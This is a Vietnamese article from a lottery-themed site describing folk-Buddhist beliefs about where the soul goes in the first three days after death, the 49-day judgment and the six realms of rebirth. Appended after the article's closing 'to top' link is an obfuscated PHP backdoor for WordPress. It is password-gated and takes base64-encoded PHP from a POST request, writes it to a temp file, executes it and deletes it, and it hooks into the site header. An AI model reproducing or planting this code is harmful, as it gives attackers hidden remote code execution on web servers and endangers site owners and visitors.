Người chết đi về đâu trong 3 ngày bạn có biết?

- Xem(700)

Người chết đi về đâu trong 3 ngày, đây chắc hẳn là điều mà bất kỳ ai cũng muốn biết, bởi đối với mỗi một gia đình, việc mất đi người mình yêu thương là vô cùng đau thương. Cùng xosochuan.net tìm hiểu chi tiết qua bài viết dưới đây nhé.

Sau khi chết linh hồn sẽ như thế nào

Sau khi chết đi, linh hồn con người bắt đầu rời khỏi thể xác, nhưng họ có thể vẫn chưa nhận ra bản thân mình đã chết nên vẫn quanh quẩn quanh nhà. Khi đó người thân cần nhờ những vị cao tăng đến khai tâm để họ biết là mình đã ra đi.

Thời điểm này linh hồn của họ rơi vào trạng thái tối tăm mờ mịt, chỉ có thể nghe được tiếng nói, sau đấy dần dần trở lại bình thường sau 1 đến 3 ngày, khi đó họ hiểu rằng mình đã chết thế nên mới có tục cúng Tam Nhật (cúng 3 ngày sau khi chết) còn trong phật giáo gọi đây là bước vào thân Trung Ấm (giai đoạn giữa cái chết và sự tái sinh), ở thân Trung Ấm, người chết sẽ về nhà bên cạnh những người thân, có thể xuất hiện trong giấc mơ hoặc hóa thành một con vật vào nhà. Bởi vậy nên các gia đình thường được khuyên là không nên khóc lóc thảm thiết để tránh cho vong linh nhìn thấy mà đau lòng không buông bỏ được.

Linh hồn  người chết đi về đâu trong 3 ngày?

Người chết đi về đâu trong 3 ngày?

Ở nơi Địa Phủ có chiếc cầu Nại Hà, chỉ có cái cầu này là cầu duy nhất dẫn Vong đi vào Âm Phủ . Dưới cầu thác lớn đổ ầm ầm, xung quanh bốn bề âm u, cây cối núi non rậm rạp. Ánh sáng dưới âm phủ không như trên trần gian nó luôn luôn như ánh sáng trăng trên cõi trần của chúng ta. Có vị Hành Sai Sứ Giả đến dẫn vong đi qua cầu đến thẳng một ngôi đền gọi là Đền Yển Túc. Tại đây Vong ghi tên họ và ngồi đợi trong một phòng chờ cùng với rất nhiều Vong khác. Tới lượt mình Vong được vị Chiếu Nghiệp Sứ Giả tra cứu sổ sách luận rõ tội phúc nghiệp quả nơi trần gian. Chỗ nào còn chối cãi không nhận lập tức có Gương Chiếu Nghiệp soi rõ.

Cứ 7 ngày gọi đối chiếu một lần, hết 7 lần thì thôi bởi thế người ta mới bày ra việc lễ Thất Tuần { 7 tuần tức là 49 ngày}. Sau 49 ngày tội phúc báo ứng đã rõ ràng Vong sẽ tùy duyên mà theo 6 con đường chính nói là Lục Đạo{ Gọi là 6 cõi }. Đó là các cõi : Phật, Tiên, Thần, Nhân, Súc Sanh, Ngạ Quỷ. Ngoài ra còn một cõi nữa gọi là Thân Trung Ấm. Nếu không vào Lục Đạo thì làm thường dân nơi Địa Phủ. Trong các cõi thì cõi Nhân tức là đâu thai lại làm người thường rất là ít và hiếm gặp.

Những Vong có duyên theo cõi Tiên thì tùy khả năng học hành tu đạo mà có thể Thăng Thiên tức là lên Thiên Giới . Trên Thiên Giới có Cửu Trùng Thiên tức là 9 tầng Trời trùng điệp. Đa số các Vong tu đạo tốt có thể lên tầng thứ 9 là tầng thấp nhất. Đối với các Vong đã thăng Thiên thì sẽ được hưởng 1 đặc ân của Thiên Giới là được phép có thể cứu giúp người thân tộc của mình thoát khỏi nạn chết. Nếu Đức Bắc Đẩu đã gạch sổ xóa tên có thể được đặc ân xin gia thêm dương thọ cho người mà Vong muốn cứu, nhưng sẽ không quá 12 năm .Thông thường chỉ được 6 năm đổ lại .Bơi thế việc thờ cúng Tổ Tiên cho đến nơi đến chốn mang lại nhiều lợi ích hơn chúng ta tưởng

Trên đây là những chia sẻ của tâm linh về Người chết đi về đâu trong 3 ngày, hy vọng rằng bạn đọc đã nắm được những thông tin kiến thức bổ ích rồi nhé.

to top if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}